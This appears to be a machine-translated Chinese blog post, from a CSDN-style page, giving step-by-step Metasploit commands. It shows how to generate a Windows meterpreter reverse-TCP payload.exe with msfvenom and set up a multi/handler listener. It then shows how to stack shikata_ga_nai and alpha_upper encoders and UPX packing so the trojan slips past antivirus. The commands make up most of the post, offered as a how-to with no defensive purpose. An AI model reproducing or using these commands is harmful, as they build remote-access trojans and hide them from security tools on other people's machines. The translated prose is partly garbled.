当前位置:网站首页>Msfvenom makes master and controlled terminals
Msfvenom makes master and controlled terminals
2022-07-28 21:53:00 【angleoldhen】
- msfconsole
- msfvenom -p windows/meterpreter/reverse_tcp lhost 192.168.107.135 lport 5000 -f exe -o /var/payload.exe
explain :-p or --payload Followed by load see msf Which loads can pass msfvenom -l payloads command
lhost Fill in the master terminal IP lpost Fill in the master port
-f or --format Format of output file
-o or --out Specify file storage path
--payload-options // list payload Standard parameter item of
--help-formats // list msf Supported output file formats

About msfvenom For more detailed parameter usage, please refer to :Metasploit——msfvenom Don't kill the Trojan horse _ Little white @ The blog of -CSDN Blog _msfvenom No killing
Generated payload.exe It is stored at the controlled end by various methods
At the main control end msfconsole perform
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp // It needs to be related to the generation of the controlled end payload Agreement
- set lhost 192.168.107.135
- set lport 5000 // These two must be the same as the main control end set when generating the controlled end IP Same as port
- exploit
![]()
The controlled end executes payload.exe after , Information can be seen at the master :
![]()
At this time, the main control end and the controlled end are connected . But because this tool is rotten , Generally, the generated controlled end will be checked and killed , Therefore, the controlled end is usually recoded .
msf The coding function in the framework can recode the controlled end , Multiple encoding , Mixed coding in many ways
perform msfvenom -l encoder You can view the encoder list ,excellent The encoder of level 1 is better
- msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.107.135 lport=5000 -e x86/nonalpha -f c
The output format here is C, You can see the coding result on the screen , Want to know many times 、 Mixed coding effect can output this format , Compare low The code encoded by is unchanged , As in the above example .
- msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.107.135 LPORT=5000 -e x86/shikata_ga_nai -i 10 -f raw |msfvenom -a x86 --platform Windows -e x86/alpha_upper -i 5 -f exe -o /var/payload.exe
The command above -i 10 It means code 10, Mixed coding needs to be written many times msfvenom Use and combine | Separate
The second code cannot be missing --platform Windows, Will not carry out , The first kind of code will report an error if it is written or not , But you can continue , The reason is unknown

Even if it is encoded many times , Most of them were also found out , You can use “ shell ” The way to
upx /var/payload.exe
This article only records ideas and commands , Most of the accused end operated as above will still be killed
边栏推荐
- 基于复杂网络的大群体应急决策专家意见与信任信息融合方法及应用
- 实现瀑布流效果
- Four methods of multi-threaded sequential operation. Ask casually during the interview
- Bully is filed for bankruptcy! The company has become a "Lao Lai", and the legal person is restricted from high consumption
- Priced at 1.15 billion yuan, 1206 pieces of equipment were injected into the joint venture! Sk Hynix grabs the mainland wafer foundry market!
- 两个全局变量__dirname和__filename 、fs模块常用功能进一步介绍
- Is it necessary to calibrate the fluke dtx-1800 test accuracy?
- 瑞典法院取消对华为和中兴的5G频谱拍卖禁令
- SkiaSharp 之 WPF 自绘 拖曳小球(案例版)
- 【Bluetooth蓝牙开发】八、BLE协议之传输层
猜你喜欢

Uniapp progress bar customization
![Leetcode interview question 02.07. Linked list intersection [knowledge points: Double pointers, stack]](/img/51/ec623bb609f5f57150e7244cf5f9b7.png)
Leetcode interview question 02.07. Linked list intersection [knowledge points: Double pointers, stack]

基于多模态融合的非遗图片分类研究

中国农业工程学会农业水土工程专业委员会-第十二届-笔记

kali里的powersploit、evasion、weevely等工具的杂项记录

8、 QoS queue scheduling and message discarding

实现瀑布流效果

纳米金偶联抗体/蛋白试剂盒(20nm,1mg/100μg/500 μg偶联量)的制备

开放式耳机哪个品牌好、性价比最高的开放式耳机排名

Nano gold coupled antibody / protein Kit (20nm, 1mg/100 μ g/500 μ G coupling amount) preparation
随机推荐
比UUID更快更安全NanoID到底是怎么实现的?(荣耀典藏版)
C语言入门【详细】
使用Mock技术帮助提升测试效率的小tips,你知道几个?
Leetcode linked list problem -- 142. circular linked list II (learn the linked list by one question and one article)
For the next generation chromebook, MediaTek launched new chipsets mt8192 and mt8195
Wechat applet development company, do you know how to choose?
酷派主动终止针对小米公司的专利侵权诉讼
Record some small requirements in the form of cases
世界肝炎日 | 基层也能享受三甲资源,智慧医疗系统如何解决“看病难”?
节省70%的显存,训练速度提高2倍!浙大&阿里提出在线卷积重新参数化OREPA,代码已开源!(CVPR 2022 )
数据库读写分离目的是做什么[通俗易懂]
软考 --- 数据库(3)数据操作
What technology is needed for applet development
MySQL
Zhuzhou Jiufang middle school carried out drowning prevention and fire safety education and training activities
MySQL
LeetCode链表问题——142.环形链表II(一题一文学会链表)
How Oracle exports data (how Oracle backs up databases)
开放式耳机哪个品牌好、性价比最高的开放式耳机排名
Skiasharp's WPF self drawn drag ball (case version)